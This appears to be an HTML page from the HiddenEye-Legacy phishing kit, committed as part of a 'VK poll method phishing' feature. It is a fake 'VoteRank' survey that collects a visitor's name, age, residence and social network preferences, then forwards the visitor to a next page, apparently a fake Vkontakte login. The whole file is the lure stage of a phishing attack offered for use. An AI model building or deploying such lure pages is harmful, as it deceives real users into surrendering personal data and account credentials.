HiddenEye-Legacy/WebPages/VK_poll_method/index.html
Usama Abdul Sattar 94b9a4ff07
added VK standard and poll method and some minor fixes (#62)
* added VK standard and poll method phishing

* Update SocialFish.py

* Update SocialFishTermux.py

* Update login.php

* Update login.php
2018-06-28 10:31:02 +05:00

104 lines
3.8 KiB
HTML

<!DOCTYPE html>
<html>
<head>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<style>
.hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #0EADFF;
display: block;margin:-15px auto 10px auto;border-radius:20px;border-color:transparent;height:40px;
}
.hover1:hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #108ee9;;
display: block;margin:-15px auto 10px auto;border-radius:20px;border-color:transparent;height:40px;
}
</style>
</head>
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VoteRank</h1>
<h1>#289032</h1>
</header>
<body bgcolor="#eff0f1" style="text-align:center;">
<div>
<form action="index2.html">
<div id="group1">
What is your name?<br><input type="text" required><br></br>
In what mountain do you live?<br><input type="text" required><br></br>
How old are you?<br><input type="text" required><br></br>
What are your favorite social networks?<br>
<input type="checkbox" value="facebook" name="social" > Facebook<br>
<input type="checkbox" value="twitter" name="social" > Twitter<br>
<input type="checkbox" value="linkedin" name="social" > LinkedIn<br>
<input type="checkbox" value="instagram" name="social" > Instagram<br>
<input type="checkbox" value="snapchat" name="social" > Snapchat<br>
<input type="checkbox" value="googleplus" name="social" > Google+<br>
<input type="checkbox" value="vkontakte" name="social" > Vkontakte<br></br>
</div>
<div id="group2">
What is your favorite color?<br>
<input type="checkbox" value="blue" name="color" > Blue<br>
<input type="checkbox" value="red" name="color" > Red<br>
<input type="checkbox" value="green" name="color" > Green<br>
<input type="checkbox" value="yellow" name="color" > Yellow<br>
<input type="checkbox" value="purple" name="color" > Purple<br>
<input type="checkbox" value="orange" name="color" > Orange<br>
<input type="checkbox" value="black" name="color" > Black<br>
<input type="checkbox" value="white" name="color" > White<br>
<input type="checkbox" value="grey" name="color" > Grey<br>
<input type="checkbox" value="brown" name="color" > Brown<br>
<input type="checkbox" value="pink" name="color" > Pink<br></br>
</div>
<div id="group3">
Do you prefer money as a gift?<br>
<input type="checkbox" value="yes" name="color" > Yes<br>
<input type="checkbox" value="no" name="color" > No<br></br>
</div>
</div>
<div id="group3">
Your favorite genre of music?<br>
<input type="checkbox" value="naarod" name="color" > People's<br>
<input type="checkbox" value="rok" name="color" > Rock<br>
<input type="checkbox" value="metal" name="color" > Metal<br>
<input type="checkbox" value="pop" name="color" > Pop<br>
<input type="checkbox" value="gjaz" name="color" > Jazz<br>
<input type="checkbox" value="shanson" name="color" > Shanson<br>
<input type="checkbox" value="hip-hop" name="color" > Hip-hop<br>
<input type="checkbox" value="rap" name="color" > Rap<br>
<input type="checkbox" value="electro" name="color" > Electronic<br>
<input type="checkbox" value="another" name="color" > Other<br></br>
<input type="submit" value="Submit" class="hover hover1">
</div>
</form>
</div>
</body>
</body>
</html>